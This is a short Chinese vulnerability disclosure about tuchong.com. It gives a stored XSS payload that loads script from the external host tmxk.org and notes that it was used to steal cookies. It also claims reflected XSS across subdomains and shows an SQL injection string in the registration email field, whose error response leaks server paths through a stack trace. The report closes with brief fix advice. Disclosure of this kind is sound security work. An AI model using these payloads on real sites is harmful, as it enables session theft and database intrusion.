详细说明:
注册了在这里配置:
在标签处插入:
a><script/src=//tmxk.org>;<!--<a
保存.
个人主页触发了 哦\(^o^)/~
这...... 自己测试了下盗取cookie危害大- -
还有个通杀的反射型xss:
tochong.com所以子站xxxxx.tuchong.com/?view=list 都有Xss漏洞
其他的反射型Xss就一堆了希望tuchong能修复,该转义 该编码 该过滤...
Zend配置也没配置好,爆路径的也很多..
谷歌下site:tuchong.com php
或者随便举个列子
注册:
<input type="text" required="" id="regEmail" name="user_email">
user_email我改成[0x7c or '1'='1'#]
{"result":"ERROR","message":"SQLSTATE[HY093]: Invalid parameter number: no parameters were bound","code":"HY093","trace":[{"file":"\/srv\/http\/tuchong\/library\/Jezo\/Db\/Adapter.php","line":945,"function":"execute","class":"PDOStatement","type":"->","args":[[]]},{"file":"\/srv\/http\/tuchong\/library\/Jezo\/Db\/TableSelect.php","line":155,"function":"query","class":"Jezo_Db_Adapter","type":"->","args":[{}]},{"file":"\/srv\/http\/tuchong\/application\/api\/controllers\/AccountController.php","line":297,"function":"fetchRow","class":"Jezo_Db_TableSelect","type":"->","args":[]},{"file":"\/srv\/http\/tuchong\/library\/Zend\/Controller\/Action.php","line":513,"function":"registerAction","class":"AccountController","type":"->","args":[]},{"file":"\/srv\/http\/tuchong\/library\/Zend\/Controller\/Dispatcher\/Standard.php","line":295,"function":"dispatch","class":"Zend_Controller_Action","type":"->","args":["registerAction"]},{"file":"\/srv\/http\/tuchong\/library\/Zend\/Controller\/Front.php","line":954,"function":"dispatch","class":"Zend_Controller_Dispatcher_Standard","type":"->","args":[{},{"headersSentThrowsException":true}]},{"file":"\/srv\/http\/tuchong\/library\/Zend\/Application\/Bootstrap\/Bootstrap.php","line":97,"function":"dispatch","class":"Zend_Controller_Front","type":"->","args":[]},{"file":"\/srv\/http\/tuchong\/library\/Zend\/Application.php","line":366,"function":"run","class":"Zend_Application_Bootstrap_Bootstrap","type":"->","args":[]},{"file":"\/srv\/http\/tuchong\/public\/api.php","line":38,"function":"run","class":"Zend_Application","type":"->","args":[]}]}
其他的- -||不说了.....
修复方案:
该转义 该编码 该过滤... zend配置好.
作者 _Evil ,www.xuhantao.com,涛涛电脑知识网
